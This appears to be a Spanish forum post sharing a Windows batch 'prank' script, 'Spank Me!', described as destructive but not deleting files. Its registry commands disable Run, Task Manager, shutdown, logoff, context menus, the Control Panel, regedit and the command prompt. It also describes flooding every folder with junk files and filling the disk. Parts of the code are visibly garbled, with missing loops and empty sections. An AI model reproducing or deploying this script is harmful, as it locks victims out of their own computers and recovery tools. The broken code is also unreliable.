El script no borra archivos, Está pensado para gastar una broma muuuuuuuuuuuy pesada, Pero sin borrar nada, No hay que ser tán malos...
Todo está explicado en el script.
Spank Me! (Bitch)
Nivel destructivo: 4/10
- Deshabilita componentes del sistema operativo.
- Genera archivos de 1 byte con nombre aleatorio por todas las carpetas dle disco duro. 100 archivos por cada carpeta.
- Genera un archivo vacío (Dummy) consumiendo todo el espacio libre del disco duro.
Código
@Echo OFF ::::::::::::::::::::::::: : Spank Me! 1.0 : : : By EleKtrO H@ckeR : : : : Testeado en Windows 7 : ::::::::::::::::::::::::: REM: Deshabilita la ejecución de archivos REG REM: Deshabilita el acceso a todas las aplicaciones (Inicio > Ejecutar) reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "RestrictRun" /T "REG_DWORD" /D "1" /f >NUL 2>&1 REM: Deshabilita el administrador de tareas reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >NUL 2>&1 REM: Deshabilita el apagado del PC reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoClose" /T "REG_DWORD" /D "1" /f >NUL 2>&1 REM: Deshabilita el cambio de usuario de sesión del PC reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "StartmenuLogoff" /T "REG_DWORD" /D "1" /f >NUL 2>&1 REM: Deshabilita el menú contextual del ratón reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoViewContextMenu" /T "REG_DWORD" /D "1" /f >NUL 2>&1 REM: Deshabilita el menú contextual del menú inicio reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoTrayContextMenu" /T "REG_DWORD" /D "1" /f >NUL 2>&1 REM: Deshabilita modificaciones en el menú inicio reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoChangeStartMenu" /T "REG_DWORD" /D "1" /f >NUL 2>&1 REM: Deshabilita el panel de control reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoControlPanel" /T "REG_DWORD" /D "1" /f >NUL 2>&1 REM: Deshabilita el regedit reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\system" /v "DisableRegistryTools" /T "REG_DWORD" /D "1" /f >NUL 2>&1 REM: Deshabilita la consola de windows reg add "%%a\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /T "REG_DWORD" /D "2" /f >NUL 2>&1 ) REM: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: REM: Crea archivos de 1 byte, Con nombre aleatorio, En todos los directorios del disco duro REM: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: setlocal enabledelayedexpansion Set File=0 Goto :Dummy :Copy Set /A File+=1 REM: ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: REM: Crea un archivo "dummy" consumiendo TODO el espacio libre del disco duro. REM: ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :DUMMY REM: Permisos REM Crear el Dummy ) REM Protección Anti-Borrado :FIN